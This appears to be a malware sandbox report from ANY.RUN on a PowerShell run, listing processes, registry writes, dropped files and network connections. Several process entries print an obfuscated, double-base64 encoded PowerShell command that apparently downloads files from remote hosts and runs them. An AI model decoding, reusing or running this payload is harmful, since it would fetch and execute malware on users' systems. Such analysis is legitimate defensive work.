M1J5ZVhza1FXTnNlbUkzTmk3aWdKeGtZRTlYYmt4dlFXUmdSbWxnVEdYaWdKMG9KRVV4TTJwbGQzTXNJQ1JJZDNweE9IZ3hLVHNrVEdWdFpuWm1ORDBvS09LQW1GQnhiZUtBbVN2aWdKaHI0b0NaS1N2aWdKaDQ0b0NaSytLQW1EQm40b0NaS1R0SlppQW9LQzRvNG9DWVIyWGlnSmtyNG9DWWRDMUpkR1hpZ0prcjRvQ1liZUtBbVNrZ0pFaDNlbkU0ZURFcEx1S0FuR3hsWUU1bllGUkk0b0NkSUMxblpTQXpNakEzTkNrZ2V5WW80b0NZU1c3aWdKa3I0b0NZZHVLQW1TdmlnSmh2YTJVdFNYUmw0b0NaSytLQW1HM2lnSmtwS0NSSWQzcHhPSGd4S1Rza1VHVmxNSHAyY1QwbzRvQ1lSK0tBbVNzbzRvQ1laalJ4YStLQW1TdmlnSmgwYytLQW1Ta3BPMkp5WldGck95Uk5OVGRzWjNkclBTamlnSmhUNG9DWkt5amlnSmhwYXVLQW1TdmlnSmhoTmVLQW1TdmlnSmhtWitLQW1Ta3BmWDFqWVhSamFIdDlmU1JGTm5ONGEyWXlQU2dvNG9DWldETnNZVi9pZ0pncjRvQ1pkK0tBbVNrcjRvQ1liT0tBbVNrPQ==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3172"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc SkU5allYWndPRE05VzJOb1lYSmROREk3SkZVMk9XSnFOREE5S0NqaWdKaENidUtBbVN2aWdKaDZZbmJpZ0prcEsrS0FtRGhzNG9DWktUc21LT0tBbUc1bGQrS0FtU3ZpZ0pndGFlS0FtU3ZpZ0poMFpXM2lnSmtwSUNSbGJuWTZkVk5GY25CeVQwWnBUR1ZjUWpJd1JGbGhhMXh2ZGxCUlNHODBYQ0F0YVhSbGJYUjVjR1VnWkVseVJXTjBiM0o1TzF0T1pYUXVVMlZ5ZG1salpWQnZhVzUwVFdGdVlXZGxjbDA2T3VLQW5ITmxRM1ZTU1hSZ1dYQmdVazlVWUc5alQwemlnSjBnUFNBb0tPS0FtSFJzY3pFeTRvQ1pLK0tBbUN6aWdKa3BLeWNnNG9DWksrS0FtWFJzNG9DWksrS0FtSE14NG9DWkt5amlnSmd4TENCMGJPS0FtU3ZpZ0poejRvQ1pLU2s3SkVOMU5ubG9NWG9nUFNBbzRvQ1lWdUtBbVNzbzRvQ1lPVzltNG9DWksrS0FtSG5pZ0prcEsrS0FtSGh3NG9DWktUc2tTSEZrZDJ4cWFUMG80b0NZUjJMaWdKa3JLT0tBbURUaWdKa3I0b0NZZFRBeDRvQ1pLU3ZpZ0poejRvQ1pLVHNrU0hkNmNUaDRNVDBrWlc1Mk9uVnpaWEp3Y205bWFXeGxLeWdvSjNzd0p5dmlnSmg5UWpJdzRvQ1pLK0tBbUdSNTRvQ1pLK0tBbUdIaWdKa3I0b0NZYTNzd2ZVOTJjSEZvYnpSN01IM2lnSmdwSUNBdFJpQWdXMk5JWVZKZE9USXBLeVJEZFRaNWFERjZLeWdvNG9DWUxtWGlnSmtyNG9DWWVPS0FtU2tyNG9DWVplS0FtU2s3SkZWMFltdHNhVFk5S09LQW1FZmlnSmtyS09LQW1HRjM0b0NaSytLQW1HcGhlZUtBbVNrcjRvQ1liT0tBbVNrN0pFRmpiSHBpTnpZOUppamlnSmh1WmVLQW1TdmlnSmgzTFc5aTRvQ1pLK0tBbUdwbFkzVGlnSmtwSUc1bFZDNVhaV0pqVEdsRlRsUTdKRkYwT1dKM1pYRTlLQ2ppZ0pobzRvQ1pLK0tBbUhoNDRvQ1pLU3NvNG9DWWNEcmlnSmdyNG9DWkwrS0FtQ2tyS09LQW1DODhjdUtBbVN2aWdKaGw0b0NaS1NzbzRvQ1laT0tBbVN2aWdKaGhZK0tBbVNrcjRvQ1lkT0tBbVNzbzRvQ1laZUtBbWVLQW1HUStMbVBpZ0prcjRvQ1liMjB2ZDNBdFllS0FtU2tyS09LQW1HUnRhVzR2VTJKdzRvQ1pLK0tBbUMvaWdKa3I0b0NZS21qaWdKa3BLK0tBbUhoNDRvQ1pLK0tBbUhEaWdKa3JLT0tBbVRvdkwrS0FtU3ZpZ0prOGN1S0FtU2tyS09LQW1HWGlnSmtyNG9DWVpHSGlnSmtyNG9DWVkzUmxaRDR1WStLQW1Ta3I0b0NZYitLQW1TdmlnSmh0NG9DWkt5amlnSmd2ZCtLQW1TdmlnSmh3TGVLQW1Ta3I0b0NZYWVLQW1Tc280b0NZYm1QaWdKa3I0b0NZYkhWa1plS0FtU2tyS09LQW1ITXY0b0NaSytLQW1Wa3Y0b0NZSytLQW1TcG9lT0tBbVN2aWdKaDRjT0tBbVNrcktPS0FtRG92NG9DWUsrS0FtUzg4Y21WazRvQ1pLK0tBbUdGamRPS0FtU2tyNG9DWVpXUSs0b0NaSytLQW1DNWo0b0NaSytLQW1HL2lnSmtyNG9DWWJTL2lnSmtyS09LQW1IZHc0b0NaSytLQW1DM2lnSmtwSytLQW1HUGlnSmtyS09LQW1HL2lnSmtyNG9DWWJ1S0FtU3ZpZ0poMFpXNTA0b0NaS1N2aWdKZ3Y0b0NaSytLQW1IZmlnSmtyNG9DWVplS0FtU3ZpZ0poeTRvQ1pLeWppZ0prdkt1S0FtU3ZpZ0psbzRvQ1pLK0tBbUhoNGNPS0FtU3ZpZ0pnNkx5ODhjdUtBbVNrcktPS0FtR1ZrNG9DWksrS0FtR0ZqZE9LQW1TdmlnSmhsWkQ0dTRvQ1pLU3NvNG9DWVkyL2lnSmtyNG9DWWJlS0FtU2tyNG9DWUwzZmlnSmtyS09LQW1IRGlnSmtyNG9DWUxXSGlnSmtwS3lqaWdKaGtiZUtBbVN2aWdKaHA0b0NaS1N2aWdKaHVMK0tBbUNzbk0wVGlnSmtyS09LQW1DOHFhSGppZ0prcjRvQ1llT0tBbVNrcjRvQ1ljRHJpZ0pncjRvQ1pMK0tBbUN2aWdKa3ZQSExpZ0prcjRvQ1laV1RpZ0prcktPS0FtR0hpZ0prcjRvQ1pZM1JsWkQ0dTRvQ1pLK0tBbVdQaWdKa3BLK0tBbUc5dDRvQ1pLeWppZ0pndmQzRGlnSmtyNG9DWUxXTnZiblRpZ0prcEt5amlnSmhsNG9DWksrS0FtRzUwNG9DWktTdmlnSmd2TStLQW1Tc280b0NZWlM4cWFPS0FtU3ZpZ0poNDRvQ1pLU3ZpZ0poNDRvQ1pLeWppZ0pod09pL2lnSmdyNG9DWkx6eGg0b0NaS1NzbzRvQ1libTkwNG9DWksrS0FtR2ppZ0prcEt5amlnSmhsY3VLQW1TdmlnSmd1NG9DWktTdmlnSmh5WldUaWdKa280b0NZWWVLQW1TdmlnSmhqZEdWa0x1S0FtU3ZpZ0psa2IrS0FtU2tyS09LQW1HMWg0b0NaSytLQW1HbmlnSmtwSytLQW1HNCtMbVBpZ0prcjRvQ1liMjNpZ0prcjRvQ1lMM1BpZ0prcjRvQ1llZUtBbVNzbzRvQ1ljeTNpZ0prcjRvQ1pZMkZqNG9DWktTdmlnSmhvWmVLQW1TdmlnSmd2NG9DWksrS0FtRmppZ0prcjRvQ1lidUtBbVNzbzRvQ1lWT0tBbVN2aWdKZ3Y0b0NaSytLQW1TcG9lSGh3T3VLQW1Ta3I0b0NaTHkvaWdKa3I0b0NaUEhUaWdKa3I0b0NZYUdYaWdKa3JLT0tBbUdiaWdKa3I0b0NZYVc1aGJDNXk0b0NaS1NzbzRvQ1laV1RpZ0prcjRvQ1lZV1BpZ0prcEt5amlnSmgwYVcvaWdKa3I0b0NZYmo0dVkyL2lnSmtwS3lqaWdKaHRMMlRpZ0prcjRvQ1lZZUtBbVN2aWdKaDBZUy9pZ0prcEt5amlnSmgxNG9DWksrS0FtR3gwYVczaWdKa3BLeWppZ0poaGRHVnRaVzFpNG9DWksrS0FtR1hpZ0prcjRvQ1ljaTlNNG9DWktTdmlnSmd2NG9DWktTN2lnSnh6VUd4Z2FWVGlnSjBvSkU5allYWndPRE1wT3lSTU5UTTFlbTFsUFNnbzRvQ1lSSFBpZ0prcjRvQ1lNM1ZsNG9DWktTdmlnSmd6NG9DWksrS0FtSERpZ0prcE8yWnZjbVZoWTJnb0pFVXhNMnBsZDNNZ2FXNGdKRkYwT1dKM1pYRXBlM1J5ZVhza1FXTnNlbUkzTmk3aWdKeGtZRTlYYmt4dlFXUmdSbWxnVEdYaWdKMG9KRVV4TTJwbGQzTXNJQ1JJZDNweE9IZ3hLVHNrVEdWdFpuWm1ORDBvS09LQW1GQnhiZUtBbVN2aWdKaHI0b0NaS1N2aWdKaDQ0b0NaSytLQW1EQm40b0NaS1R0SlppQW9LQzRvNG9DWVIyWGlnSmtyNG9DWWRDMUpkR1hpZ0prcjRvQ1liZUtBbVNrZ0pFaDNlbkU0ZURFcEx1S0FuR3hsWUU1bllGUkk0b0NkSUMxblpTQXpNakEzTkNrZ2V5WW80b0NZU1c3aWdKa3I0b0NZZHVLQW1TdmlnSmh2YTJVdFNYUmw0b0NaSytLQW1HM2lnSmtwS0NSSWQzcHhPSGd4S1Rza1VHVmxNSHAyY1QwbzRvQ1lSK0tBbVNzbzRvQ1laalJ4YStLQW1TdmlnSmgwYytLQW1Ta3BPMkp5WldGck95Uk5OVGRzWjNkclBTamlnSmhUNG9DWkt5amlnSmhwYXVLQW1TdmlnSmhoTmVLQW1TdmlnSmhtWitLQW1Ta3BmWDFqWVhSamFIdDlmU1JGTm5ONGEyWXlQU2dvNG9DWldETnNZVi9pZ0pncjRvQ1pkK0tBbVNrcjRvQ1liT0tBbVNrPQ==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3508"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENCOD SkU5allYWndPRE05VzJOb1lYSmROREk3SkZVMk9XSnFOREE5S0NqaWdKaENidUtBbVN2aWdKaDZZbmJpZ0prcEsrS0FtRGhzNG9DWktUc21LT0tBbUc1bGQrS0FtU3ZpZ0pndGFlS0FtU3ZpZ0poMFpXM2lnSmtwSUNSbGJuWTZkVk5GY25CeVQwWnBUR1ZjUWpJd1JGbGhhMXh2ZGxCUlNHODBYQ0F0YVhSbGJYUjVjR1VnWkVseVJXTjBiM0o1TzF0T1pYUXVVMlZ5ZG1salpWQnZhVzUwVFdGdVlXZGxjbDA2T3VLQW5ITmxRM1ZTU1hSZ1dYQmdVazlVWUc5alQwemlnSjBnUFNBb0tPS0FtSFJzY3pFeTRvQ1pLK0tBbUN6aWdKa3BLeWNnNG9DWksrS0FtWFJzNG9DWksrS0FtSE14NG9DWkt5amlnSmd4TENCMGJPS0FtU3ZpZ0poejRvQ1pLU2s3SkVOMU5ubG9NWG9nUFNBbzRvQ1lWdUtBbVNzbzRvQ1lPVzltNG9DWksrS0FtSG5pZ0prcEsrS0FtSGh3NG9DWktUc2tTSEZrZDJ4cWFUMG80b0NZUjJMaWdKa3JLT0tBbURUaWdKa3I0b0NZZFRBeDRvQ1pLU3ZpZ0poejRvQ1pLVHNrU0hkNmNUaDRNVDBrWlc1Mk9uVnpaWEp3Y205bWFXeGxLeWdvSjNzd0p5dmlnSmg5UWpJdzRvQ1pLK0tBbUdSNTRvQ1pLK0tBbUdIaWdKa3I0b0NZYTNzd2ZVOTJjSEZvYnpSN01IM2lnSmdwSUNBdFJpQWdXMk5JWVZKZE9USXBLeVJEZFRaNWFERjZLeWdvNG9DWUxtWGlnSmtyNG9DWWVPS0FtU2tyNG9DWVplS0FtU2s3SkZWMFltdHNhVFk5S09LQW1FZmlnSmtyS09LQW1HRjM0b0NaSytLQW1HcGhlZUtBbVNrcjRvQ1liT0tBbVNrN0pFRmpiSHBpTnpZOUppamlnSmh1WmVLQW1TdmlnSmgzTFc5aTRvQ1pLK0tBbUdwbFkzVGlnSmtwSUc1bFZDNVhaV0pqVEdsRlRsUTdKRkYwT1dKM1pYRTlLQ2ppZ0pobzRvQ1pLK0tBbUhoNDRvQ1pLU3NvNG9DWWNEcmlnSmdyNG9DWkwrS0FtQ2tyS09LQW1DODhjdUtBbVN2aWdKaGw0b0NaS1NzbzRvQ1laT0tBbVN2aWdKaGhZK0tBbVNrcjRvQ1lkT0tBbVNzbzRvQ1laZUtBbWVLQW1HUStMbVBpZ0prcjRvQ1liMjB2ZDNBdFllS0FtU2tyS09LQW1HUnRhVzR2VTJKdzRvQ1pLK0tBbUMvaWdKa3I0b0NZS21qaWdKa3BLK0tBbUhoNDRvQ1pLK0tBbUhEaWdKa3JLT0tBbVRvdkwrS0FtU3ZpZ0prOGN1S0FtU2tyS09LQW1HWGlnSmtyNG9DWVpHSGlnSmtyNG9DWVkzUmxaRDR1WStLQW1Ta3I0b0NZYitLQW1TdmlnSmh0NG9DWkt5amlnSmd2ZCtLQW1TdmlnSmh3TGVLQW1Ta3I0b0NZYWVLQW1Tc280b0NZYm1QaWdKa3I0b0NZYkhWa1plS0FtU2tyS09LQW1ITXY0b0NaSytLQW1Wa3Y0b0NZSytLQW1TcG9lT0tBbVN2aWdKaDRjT0tBbVNrcktPS0FtRG92NG9DWUsrS0FtUzg4Y21WazRvQ1pLK0tBbUdGamRPS0FtU2tyNG9DWVpXUSs0b0NaSytLQW1DNWo0b0NaSytLQW1HL2lnSmtyNG9DWWJTL2lnSmtyS09LQW1IZHc0b0NaSytLQW1DM2lnSmtwSytLQW1HUGlnSmtyS09LQW1HL2lnSmtyNG9DWWJ1S0FtU3ZpZ0poMFpXNTA0b0NaS1N2aWdKZ3Y0b0NaSytLQW1IZmlnSmtyNG9DWVplS0FtU3ZpZ0poeTRvQ1pLeWppZ0prdkt1S0FtU3ZpZ0psbzRvQ1pLK0tBbUhoNGNPS0FtU3ZpZ0pnNkx5ODhjdUtBbVNrcktPS0FtR1ZrNG9DWksrS0FtR0ZqZE9LQW1TdmlnSmhsWkQ0dTRvQ1pLU3NvNG9DWVkyL2lnSmtyNG9DWWJlS0FtU2tyNG9DWUwzZmlnSmtyS09LQW1IRGlnSmtyNG9DWUxXSGlnSmtwS3lqaWdKaGtiZUtBbVN2aWdKaHA0b0NaS1N2aWdKaHVMK0tBbUNzbk0wVGlnSmtyS09LQW1DOHFhSGppZ0prcjRvQ1llT0tBbVNrcjRvQ1ljRHJpZ0pncjRvQ1pMK0tBbUN2aWdKa3ZQSExpZ0prcjRvQ1laV1RpZ0prcktPS0FtR0hpZ0prcjRvQ1pZM1JsWkQ0dTRvQ1pLK0tBbVdQaWdKa3BLK0tBbUc5dDRvQ1pLeWppZ0pndmQzRGlnSmtyNG9DWUxXTnZiblRpZ0prcEt5amlnSmhsNG9DWksrS0FtRzUwNG9DWktTdmlnSmd2TStLQW1Tc280b0NZWlM4cWFPS0FtU3ZpZ0poNDRvQ1pLU3ZpZ0poNDRvQ1pLeWppZ0pod09pL2lnSmdyNG9DWkx6eGg0b0NaS1NzbzRvQ1libTkwNG9DWksrS0FtR2ppZ0prcEt5amlnSmhsY3VLQW1TdmlnSmd1NG9DWktTdmlnSmh5WldUaWdKa280b0NZWWVLQW1TdmlnSmhqZEdWa0x1S0FtU3ZpZ0psa2IrS0FtU2tyS09LQW1HMWg0b0NaSytLQW1HbmlnSmtwSytLQW1HNCtMbVBpZ0prcjRvQ1liMjNpZ0prcjRvQ1lMM1BpZ0prcjRvQ1llZUtBbVNzbzRvQ1ljeTNpZ0prcjRvQ1pZMkZqNG9DWktTdmlnSmhvWmVLQW1TdmlnSmd2NG9DWksrS0FtRmppZ0prcjRvQ1lidUtBbVNzbzRvQ1lWT0tBbVN2aWdKZ3Y0b0NaSytLQW1TcG9lSGh3T3VLQW1Ta3I0b0NaTHkvaWdKa3I0b0NaUEhUaWdKa3I0b0NZYUdYaWdKa3JLT0tBbUdiaWdKa3I0b0NZYVc1aGJDNXk0b0NaS1NzbzRvQ1laV1RpZ0prcjRvQ1lZV1BpZ0prcEt5amlnSmgwYVcvaWdKa3I0b0NZYmo0dVkyL2lnSmtwS3lqaWdKaHRMMlRpZ0prcjRvQ1lZZUtBbVN2aWdKaDBZUy9pZ0prcEt5amlnSmgxNG9DWksrS0FtR3gwYVczaWdKa3BLeWppZ0poaGRHVnRaVzFpNG9DWksrS0FtR1hpZ0prcjRvQ1ljaTlNNG9DWktTdmlnSmd2NG9DWktTN2lnSnh6VUd4Z2FWVGlnSjBvSkU5allYWndPRE1wT3lSTU5UTTFlbTFsUFNnbzRvQ1lSSFBpZ0prcjRvQ1lNM1ZsNG9DWktTdmlnSmd6NG9DWksrS0FtSERpZ0prcE8yWnZjbVZoWTJnb0pFVXhNMnBsZDNNZ2FXNGdKRkYwT1dKM1pYRXBlM1J5ZVhza1FXTnNlbUkzTmk3aWdKeGtZRTlYYmt4dlFXUmdSbWxnVEdYaWdKMG9KRVV4TTJwbGQzTXNJQ1JJZDNweE9IZ3hLVHNrVEdWdFpuWm1ORDBvS09LQW1GQnhiZUtBbVN2aWdKaHI0b0NaS1N2aWdKaDQ0b0NaSytLQW1EQm40b0NaS1R0SlppQW9LQzRvNG9DWVIyWGlnSmtyNG9DWWRDMUpkR1hpZ0prcjRvQ1liZUtBbVNrZ0pFaDNlbkU0ZURFcEx1S0FuR3hsWUU1bllGUkk0b0NkSUMxblpTQXpNakEzTkNrZ2V5WW80b0NZU1c3aWdKa3I0b0NZZHVLQW1TdmlnSmh2YTJVdFNYUmw0b0NaSytLQW1HM2lnSmtwS0NSSWQzcHhPSGd4S1Rza1VHVmxNSHAyY1QwbzRvQ1lSK0tBbVNzbzRvQ1laalJ4YStLQW1TdmlnSmgwYytLQW1Ta3BPMkp5WldGck95Uk5OVGRzWjNkclBTamlnSmhUNG9DWkt5amlnSmhwYXVLQW1TdmlnSmhoTmVLQW1TdmlnSmhtWitLQW1Ta3BmWDFqWVhSamFIdDlmU1JGTm5ONGEyWXlQU2dvNG9DWldETnNZVi9pZ0pncjRvQ1pkK0tBbVNrcjRvQ1liT0tBbVNrPQ==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepwsh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3652"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
3672"C:\Windows\system32\NOTEPAD.EXE" "C:\Users\admin\AppData\Local\Temp\test.txt"C:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
Total events
23 417
Read events
23 220
Write events
193
Delete events
4

Modification events

(PID) Process:(3672) notepad.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation:writeName:NodeSlots
Value:
0202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202
(PID) Process:(3672) notepad.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation:writeName:MRUListEx
Value:
02000000070000000100000006000000000000000B0000000C0000000D0000000A0000000900000008000000030000000500000004000000FFFFFFFF
(PID) Process:(3672) notepad.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\50\ComDlg
Operation:writeName:TV_FolderType
Value:
{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}
(PID) Process:(3672) notepad.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\50\ComDlg
Operation:writeName:TV_TopViewID
Value:
{82BA0782-5B7A-4569-B5D7-EC83085F08CC}
(PID) Process:(3672) notepad.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\50\ComDlg
Operation:writeName:TV_TopViewVersion
Value:
0
(PID) Process:(3672) notepad.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3672) notepad.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}
Operation:writeName:Mode
Value:
4
(PID) Process:(3672) notepad.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}
Operation:writeName:LogicalViewMode
Value:
1
(PID) Process:(3672) notepad.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}
Operation:writeName:FFlags
Value:
(PID) Process:(3672) notepad.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}
Operation:writeName:IconSize
Value:
16
Executable files
0
Suspicious files
11
Text files
4
Unknown types
8

Dropped files

PID
Process
Filename
Type
2208pwsh.exeC:\Users\admin\AppData\Local\Microsoft\PowerShell\7.2.11\update1_v7.4.1_2024-01-11
MD5:
SHA256:
2208pwsh.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\e1a648060a327b80.customDestinations-msbinary
MD5:A20A86C096ADCB3F2B94729E95AC8359
SHA256:9B6C50119EFA806C4BD1CD2C2B0A8524F261AA19EC2B882AD52677A2A0ADC273
3508powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
2208pwsh.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_i4od31u0.2mc.psm1text
MD5:5CF4B3280603C6B6C9F36C169457C198
SHA256:068E9DCCC9510F2AE9E4A8C46C14416638DFA16DA3188920D2E68B516831A15C
3508powershell.exeC:\Users\admin\AppData\Local\Temp\xdzln1t5.gec.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2208pwsh.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txttext
MD5:22B9F9ED8A80E2733A32B9558D4671D3
SHA256:1291CD88E2A6356C5B3959C9F8132F07F781E715182DF192110589403F82E197
2208pwsh.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IBQNMNMIZ7XJKWFJ3TU4.tempbinary
MD5:A20A86C096ADCB3F2B94729E95AC8359
SHA256:9B6C50119EFA806C4BD1CD2C2B0A8524F261AA19EC2B882AD52677A2A0ADC273
1772powershell.exeC:\Users\admin\AppData\Local\Temp\fwj3aj1d.sp4.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2900powershell.exeC:\Users\admin\AppData\Local\Temp\ksx5ihd3.i4z.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3508powershell.exeC:\Users\admin\AppData\Local\Temp\xpo4w2cb.jrw.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
7
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
2208
pwsh.exe
23.38.74.58:443
aka.ms
AKAMAI-AS
DE
unknown
2208
pwsh.exe
52.239.160.36:443
pscoretestdata.blob.core.windows.net
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
2208
pwsh.exe
20.50.88.245:443
dc.services.visualstudio.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown

DNS requests

Domain
IP
Reputation
aka.ms
  • 23.38.74.58
whitelisted
pscoretestdata.blob.core.windows.net
  • 52.239.160.36
unknown
dc.services.visualstudio.com
  • 20.50.88.245
whitelisted

Threats

No threats detected
Process
Message
pwsh.exe
Profiler was prevented from loading notification profiler due to app settings. Process ID (decimal): 2208. Message ID: [0x2509].
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
test.txt